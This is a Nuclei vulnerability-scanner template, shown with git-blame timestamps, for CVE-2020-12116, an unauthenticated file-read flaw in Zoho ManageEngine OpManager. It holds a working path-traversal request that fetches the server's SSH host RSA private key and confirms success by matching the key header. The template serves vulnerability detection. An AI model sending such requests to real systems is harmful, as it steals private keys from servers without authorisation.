nuclei-templates/cves/2020/CVE-2020-12116.yaml

46 lines
1.2 KiB
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-12116
2020-10-01 06:55:32 +00:00
info:
name: Unauthenticated Zoho ManageEngine OpManger Arbitrary File Read
author: dwisiswant0
severity: high
description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request.
2021-03-18 07:54:36 +00:00
tags: cve,cve2020,zoho,lfi
2021-03-06 10:55:24 +00:00
reference: https://github.com/BeetleChunks/CVE-2020-12116
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2020-12116
cwe-id: CWE-22
2020-10-01 06:55:32 +00:00
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept: */*
Connection: close
- |
2021-02-02 20:38:35 +00:00
GET §endpoint§../../../../bin/.ssh_host_rsa_key HTTP/1.1
2020-10-01 06:55:32 +00:00
Host: {{Hostname}}
Accept: */*
Cache-Control: max-age=0
Connection: close
Referer: http://{{Hostname}}
extractors:
- type: regex
name: endpoint
part: body
internal: true
regex:
- "(?m)/cachestart/.*/jquery/"
2021-06-29 21:56:01 +00:00
req-condition: true
2020-10-01 06:55:32 +00:00
matchers:
2021-06-29 21:56:01 +00:00
- type: dsl
dsl:
- 'contains(body_2, "BEGIN RSA PRIVATE KEY")'
- 'status_code_2 == 200'
condition: and